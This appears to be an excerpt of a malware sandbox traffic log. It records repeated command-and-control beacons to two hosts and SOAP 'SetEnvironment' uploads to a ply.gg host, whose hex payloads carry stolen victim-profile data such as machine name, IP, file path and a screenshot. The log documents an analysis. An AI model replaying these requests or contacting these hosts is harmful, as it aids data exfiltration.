Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95722Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95721Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95721Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 7
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95722Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 7
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
